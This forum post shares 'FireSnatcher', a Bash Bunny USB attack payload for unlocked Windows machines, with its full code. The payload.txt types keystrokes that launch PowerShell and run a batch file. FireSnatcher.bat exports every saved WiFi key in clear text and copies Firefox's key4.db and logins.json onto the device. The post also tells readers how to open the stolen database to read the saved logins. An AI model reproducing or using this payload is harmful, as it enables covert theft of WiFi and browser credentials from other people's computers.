Jump to content

[PAYLOAD] FireSnatcher


KarrotKak3
 Share

Recommended Posts

Greetings. This is my First Payload written for the Bash Bunny.


https://github.com/KarrotKak3/FireSnatcher.git

 

# Props:         saintcrossbow & 0iphor13 - I used their work for examples
 

# Full Description
# ----------------
#   Attacks an Unlocked Windows Machine
#  Payload targets:
#    - All WiFi creds
#    - Firefox Saved Password Database
#
#  PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
 

# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds

#   KNOWN ISSUES
#  ---------------
#  Loot is saved in Payloads/switch#/loot
 

CODE:

Payload.txt

# Title:         FireSnatcher
# Description:   Copies Wifi Keys, and Firefox Password Databases
# Author:        KarrotKak3
# Props:         saintcrossbow & 0iphor13
# Version:       1.0.2.0 (Work in Progress)
# Category:      Credentials
# Target:        Windows (Logged in) 
# Attackmodes:   HID, Storage

# Full Description
# ----------------
#   Attacks an Unlocked Windows Machine
#  Payload targets:
#    - All WiFi creds
#    - Firefox Saved Password Database
#
#  PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
#    Delays to Allow Powershell Time to Open and to Give Attack time to Run

# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
#   %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
#     Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins


#   KNOWN ISSUES
#  ---------------
#  Loot is saved in Payloads/switch#/loot


# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds


# Setup
# -----
# - Place the payload.txt and FireSnatcher.bat in Payload folder
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility

# LEDs
# ----
# Magenta: Initial setup – about 1 – 3 seconds
# Single yellow blink: Attack in progress
# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed

# Options
# -------
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
BB_NAME="BashBunny"

# Setup
# -----
LED SETUP


# Attack
# ------
ATTACKMODE HID STORAGE
Q DELAY 500
LED ATTACK
Q DELAY 100
Q GUI r
Q DELAY 100
Q STRING powershell Start-Process powershell
Q ENTER
Q DELAY 7000
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
Q ENTER
Q DELAY 8000
Q STRING EXIT
Q ENTER
sync
LED FINISH
Q DELAY 1500
shutdown now

FireSnatcher.bat

mkdir %~dp0\loot\%COMPUTERNAME%
cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
C: cd \D %appdata%\mozilla\firefox\profiles\
cd %appdata%\mozilla\firefox\profiles\*.default-release\
copy key4.db %~dp0\loot\%COMPUTERNAME%
copy logins.json %~dp0\loot\%COMPUTERNAME%

##
## Usage: Make Files Payload.txt and FireSnatcher.bat containing above code
##              Copy Both files to either Payloads\{switch1 or switch2}
##
##       Loot will be copied to .\payloads\{switch}\loot instead of .\loot

 

As Always, I am not Responsible for what you do with this payload.

 

   KarrotKak3

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...